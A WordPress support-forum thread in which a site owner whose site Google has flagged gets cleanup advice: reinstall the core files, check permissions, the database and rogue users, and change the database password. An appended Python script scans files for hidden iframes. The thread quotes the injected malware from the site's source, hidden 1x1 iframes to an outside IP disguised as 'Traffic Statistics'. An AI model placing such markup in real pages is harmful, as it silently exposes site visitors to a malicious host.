Upgrading alone is not really a fix right?
It is the proper fix if done in time.
In your situation first clean up the site and then upgrade. Without cleaning the malicious code, the upgrade won’t help in itself.
Is there any efficient and thorough way to scrub my site without manually looking at a bunch of files in a text editor?
Not really. You either delete all your WP files from the server and install a clean package, or you go through the files.
Two notes:
1. If your site has been hacked by injecting stuff into the database… that’s even worse than just cleaning the files.
2. Many times, if files were corrupted or installed on your site, they might be in the wp-content folder (e.g. under upload in strange folders) – and all the upgrade instructions say “do not delete the wp-content folder”; so even after a carefully executed upgrade the bad things might sit there.
I went through all the theme files and couldn’t see anything suspicious. I really have no idea what’s going on. Everything seems fine except that Google has me flagged. I don’t understand how serving up text content can be so complicated and dangerous.
So the bottom line is that I’m screwed and there’s no way to solve this?
How is it that hackers are able to modify my files anyway?
It’s terribly annoying to have to go through someone’s post history to get a URL. :(( Your site is here:
http://www.unallied.com/
and it’s compromised.
<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --><!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --><!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
How is it that hackers are able to modify my files anyway?
Since Google won’t cache it in its present state, I can’t really tell for sure, but chances are that it’s been like this for quite some time.
Is there any efficient and thorough way to scrub my site without manually looking at a bunch of files in a text editor?
Yes, and no. You aren’t using any plugins, really, so I would go through the theme files with an editor, yes.
You double-check ALL the permissions on your files and the dirs. You look for any stray files that you didn’t upload. You check your DB for any odd entries or rogue users. Then you shitcan ALL of the core WP files (delete them ALL except for the wp-config.php) and you upload fresh ones. And, I would assume the worst, your mysql passwd inside the wp-config.php has been compromised — so I would change it.
That’s where I would start if it were MY site.
PS: If you are unwilling to do all of that, or unable, I do “clean up” compromised sites. I charge, but I’m very reasonable. I’ve a contact form on my own site for those sorts of requests.
Actually, Yahoo does caching now —
http://cache.search.yahoo.net/search/cache?ei=UTF-8&p=http%3A%2F%2Fwww.unallied.com&fr=yfp-t-501&u=www.unallied.com/&d=RIQcvhg5RMs7&icp=1&.intl=us
That’s your site back at 2.3.3, and notice in the source, it’s compromised, so it’s been there at least since before you upgraded.
Thanks for the help. I looked at every file in my template (the ones editable from within the admin panel) and didn’t see any iframe stuff or stuff that looked suspicious. I guess I could have missed it.
A few hours ago I wiped everything and uploaded a fresh version except wp-config and the theme I’m using. So, the theme could be suspect, and the database.
I’m surprised that there isn’t some kind of anti-virus PHP code that could scan a WP install for this stuff. I’m not saying it’s trivial by any means, but it seems not that hard by someone who knows what they are doing.
There’s a plugin, but the fact is, that’s not a solution, it’s just another tool, and frankly, I don’t trust plugins to do a job I know I can do better.
Reliance on plugins isn’t the solution — they become crutches, and largely ARE crutches in this community. You were running an old version of WP prior to upgrading to the 2.3.x branch; I found a cached page of your site that indicated you were at 2.04 or something. The ultimate solution is to stay on top of upgrades. That’s the singular best thing people can do.
A few hours ago I wiped everything …
And the malicious content is still there.
How can you tell it’s still there, and since you can, can you tell where or what?
How can you tell …
Because I can see it in your source.
Every browser comes with the ability to view source.
As for the rest of the question:
http://wordpress.org/search/wp-stats.php?forums=1
This isn’t new.
I found a bunch of crap in the body of the post. Hopefully that’s it.
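
An added example, not part of any post in this thread: a small Python scanner for the kind of hidden iframe quoted above (1x1 pixels, or hidden with inline CSS), run over a directory holding the theme, wp-content and a SQL dump of the database. The function names, the extension list and the "1 pixel or less" heuristic are assumptions made for this illustration.

```python
import os
import re
import sys

# An <iframe ...> opening tag; attributes may be unquoted, as in the thread's sample.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# The optional backslash covers escaped quotes (\") as they appear in a SQL dump.
SRC_RE = re.compile(r"""\bsrc\s*=\s*\\?["']?([^\s"'>\\]+)""", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*\\?["']?(\d+)""", re.IGNORECASE)
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
# Assumption: file types worth reading as text; extend for your own site.
TEXT_EXTS = (".php", ".html", ".htm", ".js", ".sql")


def find_hidden_iframes(text):
    """Return [(line_number, src)] for iframes sized <= 1px or hidden by inline CSS."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        tiny = any(int(v) <= 1 for _name, v in DIM_RE.findall(tag))
        if tiny or HIDDEN_CSS_RE.search(tag):
            src = SRC_RE.search(tag)
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, src.group(1) if src else ""))
    return hits


def scan_tree(root):
    """Scan every text-like file under root; return {path: hits} for files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TEXT_EXTS):
                continue
            path = os.path.join(dirpath, name)
            # errors="replace" keeps the scan going on files with odd encodings.
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    # Usage: python scan_iframes.py /path/to/site-or-dump-directory
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        for line, src in hits:
            print(f"{path}:{line}: hidden iframe -> {src or '(no src)'}")
```

A hit inside the SQL dump means the markup lives in database content such as a post body, which replacing the WordPress files does not touch. A clean result only rules out this one pattern, so it does not replace the permission, stray-file and user checks listed in the thread.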